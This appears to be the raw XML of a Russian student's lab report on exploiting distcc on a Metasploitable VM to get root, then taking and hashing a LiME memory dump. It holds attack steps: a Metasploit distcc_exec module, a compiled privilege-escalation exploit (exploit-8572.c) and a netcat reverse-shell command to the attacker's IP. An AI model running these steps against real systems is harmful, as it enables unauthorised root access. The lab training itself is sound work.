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E8F" w14:textId="14FDB303" w:rsidR="002E44BD" w:rsidRPr="009F6539" w:rsidRDefault="001F5F48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Фахрутдинов Булат </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F653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Загфярович</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71F2D9CF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gramStart"/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>11-902</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5A1C7DDB" w14:textId="2A6C022B" w:rsidR="009F6539" w:rsidRDefault="00C42740" w:rsidP="00C42740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274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№2. ИСПОЛЬЗОВАНИЕ DISTCC ДЛЯ ПОЛУЧЕНИЯ ПРАВ ROOT. СОЗДАНИЕ ДАМПА ПАМЯТИ LIME И ЕГО АНАЛИЗ.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9BF74D" w14:textId="77777777" w:rsidR="00C42740" w:rsidRPr="00C42740" w:rsidRDefault="00C42740" w:rsidP="00C42740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0A4B2F" w14:textId="0877ECA1" w:rsidR="001F5F48" w:rsidRPr="00C42740" w:rsidRDefault="00EF20BD" w:rsidP="00A815F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 задач</w:t>
      </w:r>
      <w:r w:rsid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7E684F"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7E684F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>научиться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 xml:space="preserve">получать доступ к </w:t>
      </w:r>
      <w:r w:rsidR="00C42740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root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  <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>атакуемого устройства</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416862E" w14:textId="77777777" w:rsidR="00615276" w:rsidRDefault="00615276" w:rsidP="00A815FF">
      <w:pPr>
        <w:pStyle w:val="a3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52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Ход работ: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30678EDA" w14:textId="53E2B2F5" w:rsidR="00CA4D6C" w:rsidRPr="00CA4D6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скачан образ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OC</w:t>
      </w:r>
      <w:r w:rsidR="00C42740" w:rsidRPr="00C42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42740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali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разрешением «.</w:t>
      </w:r>
      <w:r w:rsidR="00C42740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>iso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152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установлен на виртуальную машину </w:t>
      </w:r>
      <w:r w:rsidR="00CA4D6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VMWare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0A5E09" w14:textId="05A85AA2" w:rsidR="00615276" w:rsidRPr="00E64E0C" w:rsidRDefault="00615276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D6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Были проверены технические характеристики виртуальной машины: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архитектура процессора – х64, количество процессоров – 1, объем ОЗУ – 512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MB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размер жесткого диска – 1</w:t>
      </w:r>
      <w:r w:rsidR="00C42740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6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 xml:space="preserve"> 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</w:rPr>
        <w:t>GB</w:t>
      </w:r>
      <w:r w:rsidR="00E64E0C" w:rsidRPr="00E64E0C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, тип сетевого подключения – сетевой мост.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F2AF2" w14:textId="40567455" w:rsidR="00E64E0C" w:rsidRDefault="00A815FF" w:rsidP="00A815F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выполнен вход в систему и запрос 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815F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адреса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F445DC0" w14:textId="5F1F07C5" w:rsidR="00A815FF" w:rsidRDefault="00A815FF" w:rsidP="00A815FF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адреса виртуальной ОС в сети. Адрес был локальным, поэтому было необходимо получить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DHCP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адрес, для связи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ПК</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4479F3D9" w14:textId="44325606" w:rsidR="00A815FF" w:rsidRDefault="00A815FF" w:rsidP="00A815FF">
      <w:pPr>
        <w:pStyle w:val="a3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Выполнена команда </w:t>
      </w:r>
      <w:r w:rsidRPr="00A815F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dhclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A815FF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– для получения публичного адреса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1B0E21" w14:textId="56B949B8" w:rsidR="00A815FF" w:rsidRDefault="00451195" w:rsidP="0045119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 был записан для дальнейшей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хостовым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ПК</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DF967" w14:textId="3C58DAD1" w:rsidR="00451195" w:rsidRPr="00990AA3" w:rsidRDefault="00C42740" w:rsidP="0045119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Запуск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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08686B33" w14:textId="571235F4" w:rsidR="00990AA3" w:rsidRPr="00990AA3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 команду “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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1-65535 -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4 -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v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MS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IP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2&gt;&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 | 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tee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var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scan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C42740" w:rsidRPr="00C42740">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>txt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482F57C8" w14:textId="2244E8BB" w:rsidR="00990AA3" w:rsidRPr="00717FFD" w:rsidRDefault="00990AA3" w:rsidP="00990AA3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90AA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Убедился </w:t>
      </w:r>
      <w:r w:rsidRPr="00990AA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том, что </w:t>
      </w:r>
      <w:r w:rsidR="00C4274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все успешно запущено</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475087E8" w14:textId="0259916B" w:rsidR="00492AB1" w:rsidRPr="00802215" w:rsidRDefault="003B0C88" w:rsidP="0080221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Настройка загрузчика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distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14B42617" w14:textId="0CA30B67" w:rsidR="00802215" w:rsidRPr="003B0C88" w:rsidRDefault="003B0C88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Зашел</w:t>
      </w:r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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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запустил</w:t>
      </w:r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exploit</w:t>
      </w:r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-&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r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exploit/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unix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misc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distcc_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="718DCE05" w14:textId="1B070DD4" w:rsidR="00802215" w:rsidRPr="003B0C88" w:rsidRDefault="00802215" w:rsidP="00802215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="003B0C88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ыбрал</w:t>
      </w:r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0C88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загрузчик</w:t>
      </w:r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0C88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RUBY</w:t>
      </w:r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0C88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0C88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>установил</w:t>
      </w:r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B0C88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r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192.168.244.129 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003B0C88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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C88"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 w:rsidR="003B0C88" w:rsidRPr="003B0C88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258A8FA8" w14:textId="4E73DA6B" w:rsidR="000732D8" w:rsidRPr="000732D8" w:rsidRDefault="003B0C88" w:rsidP="000732D8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Скачивание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exploit-8572.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD155FD" w14:textId="53F69B6A" w:rsidR="000732D8" w:rsidRPr="003B0C88" w:rsidRDefault="003B0C88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Скачал и скомпилировал файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003B0C88">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-8572.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="003B0C8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командой «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gcc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2770EFE3" w14:textId="112FAE5C" w:rsidR="000732D8" w:rsidRPr="00DD2401" w:rsidRDefault="00DD2401" w:rsidP="000732D8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Убедился в успешности создания исполняемого файла </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(-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DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>--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  <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>--)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51758BAE" w14:textId="65A173F6" w:rsidR="008F1D0D" w:rsidRPr="008F1D0D" w:rsidRDefault="00DD2401" w:rsidP="008F1D0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Открытие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NETCAT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сессии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D42E6AD" w14:textId="0649803A" w:rsidR="008F1D0D" w:rsidRPr="00DD2401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>echo '</w:t>
      </w:r>
      <w:proofErr w:type="gram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DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bin/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>' &gt; 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>/run;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>echo '/bin/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netcat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 -e /bin/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sh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> KL_IP 4444' &gt;&gt; /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/run;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2401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</w:p>
    <w:p w14:paraId="3AC3B032" w14:textId="33D07D35" w:rsidR="005225FC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Определил </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PID</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD24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родителя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запустил </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD24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DD2401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exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-8572</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700ADA5F" w14:textId="4884D06F" w:rsidR="00D607F2" w:rsidRPr="005C520F" w:rsidRDefault="00DD2401" w:rsidP="008F1D0D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</w:rPr>
        <w:t xml:space="preserve">root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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60A2CFDB" w14:textId="66AF55D4" w:rsidR="005C520F" w:rsidRPr="00DD2401" w:rsidRDefault="00DD2401" w:rsidP="005C5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Провел сисадмин анализ наших действий на машине </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD2401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пункт 1.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE8F75" w14:textId="27C111B7" w:rsidR="00BA6016" w:rsidRPr="00BA6016" w:rsidRDefault="00DD2401" w:rsidP="00BA601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Подготовка директории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242C1E16" w14:textId="4D34F0EE" w:rsidR="00BA6016" w:rsidRPr="00DD2401" w:rsidRDefault="00DD2401" w:rsidP="00BA601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Создал</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2401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>папку</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2401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Pr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2401">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>distcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A7AEB5" w14:textId="2D083613" w:rsidR="00B03D55" w:rsidRPr="00FA2BC7" w:rsidRDefault="00DD2401" w:rsidP="00BA6016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Изменил владельца, а также установил </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E224D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E224D" w:rsidRPr="000E224D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="202124"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 755</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C484E52" w14:textId="473FB8C9" w:rsidR="00FA2BC7" w:rsidRPr="000E224D" w:rsidRDefault="00FA2BC7" w:rsidP="00FA2BC7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42740">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsid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Создание дампа и сбор сведений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F62B3" w14:textId="72A0E217" w:rsidR="00F87305" w:rsidRPr="000E224D" w:rsidRDefault="000E224D" w:rsidP="00FA2BC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Перешел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скачанную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прошлой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лабе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папку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LiME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src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выполнил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</w:rPr>
        <w:t>insmod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./lime-2.6.24-16-server.ko "path=/var/www/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</w:rPr>
        <w:t>distcc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</w:rPr>
        <w:t>distcc_memory.lime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 format=lime";</w:t>
      </w:r>
      <w:r w:rsidRPr="000E224D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</w:p>
    <w:p w14:paraId="210E7BDA" w14:textId="34A8B7BE" w:rsidR="000E224D" w:rsidRPr="000E224D" w:rsidRDefault="000E224D" w:rsidP="00FA2BC7">
      <w:pPr>
        <w:pStyle w:val="a3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Собрал сведения о сетевых соединениях, используемых файлах и работающих процессорах </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C8B16" w14:textId="04DC6869" w:rsidR="00FA2BC7" w:rsidRPr="00F87305" w:rsidRDefault="00F87305" w:rsidP="00F8730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Создание </w:t>
      </w:r>
      <w:r w:rsid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хэш-суммы</w:t>
      </w:r>
      <w:r w:rsidR="00374528" w:rsidRPr="00F8730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7AEBB631" w14:textId="0F4AC3A9" w:rsidR="00B8476B" w:rsidRPr="00A32627" w:rsidRDefault="000E224D" w:rsidP="008B69AA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:num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Выполнил сбор </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MD</w:t>
      </w:r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хэша папки </w:t>
      </w:r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var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www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distcc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командой «</w:t>
      </w:r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md5sum * | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>tee</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E22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distcc_md5.txt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sectPr w:rsidR="00B8476B" w:rsidRPr="00A32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41E2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7CC88CB8"/>
    <w:lvl w:ilvl="0" w:tplc="FE4C4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F88"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8BF84CD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num w:numId="1" w16cid:durableId="677580963">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1706102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84"/>
    <w:rsid w:val="000732D8"/>
    <w:rsid w:val="000E224D"/>
    <w:rsid w:val="00144AFD"/>
    <w:rsid w:val="001A16F8"/>
    <w:rsid w:val="001F5F48"/>
    <w:rsid w:val="00290973"/>
    <w:rsid w:val="00336FAC"/>
    <w:rsid w:val="003657E9"/>
    <w:rsid w:val="00374528"/>
    <w:rsid w:val="003B0C88"/>
    <w:rsid w:val="003C27D5"/>
    <w:rsid w:val="003F6F97"/>
    <w:rsid w:val="00413768"/>
    <w:rsid w:val="00451195"/>
    <w:rsid w:val="00492AB1"/>
    <w:rsid w:val="00493969"/>
    <w:rsid w:val="00496893"/>
    <w:rsid w:val="005225FC"/>
    <w:rsid w:val="005C520F"/>
    <w:rsid w:val="00615276"/>
    <w:rsid w:val="006751CD"/>
    <w:rsid w:val="006B2A05"/>
    <w:rsid w:val="00717FFD"/>
    <w:rsid w:val="0078176E"/>
    <w:rsid w:val="007E3E59"/>
    <w:rsid w:val="007E684F"/>
    <w:rsid w:val="00802215"/>
    <w:rsid w:val="0082025B"/>
    <w:rsid w:val="008B69AA"/>
    <w:rsid w:val="008F1D0D"/>
    <w:rsid w:val="008F1D29"/>
    <w:rsid w:val="00990AA3"/>
    <w:rsid w:val="009F6539"/>
    <w:rsid w:val="00A32627"/>
    <w:rsid w:val="00A815FF"/>
    <w:rsid w:val="00B03D55"/>
    <w:rsid w:val="00B8476B"/>
    <w:rsid w:val="00BA6016"/>
    <w:rsid w:val="00BD3C46"/>
    <w:rsid w:val="00C42740"/>
    <w:rsid w:val="00CA4D6C"/>
    <w:rsid w:val="00D607F2"/>
    <w:rsid w:val="00DD2401"/>
    <w:rsid w:val="00E64E0C"/>
    <w:rsid w:val="00E72933"/>
    <w:rsid w:val="00EB6684"/>
    <w:rsid w:val="00EF20BD"/>
    <w:rsid w:val="00F87305"/>
    <w:rsid w:val="00F874C7"/>
    <w:rsid w:val="00FA2BC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03E0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D9866587-FC12-46D3-A58F-FF1FAB6A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F48"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="normaltextrun">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009F6539"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="009F6539"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008B69A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Griim Zz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Выпускник Булат Фахрутдинов</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-27T21:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-05T18:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>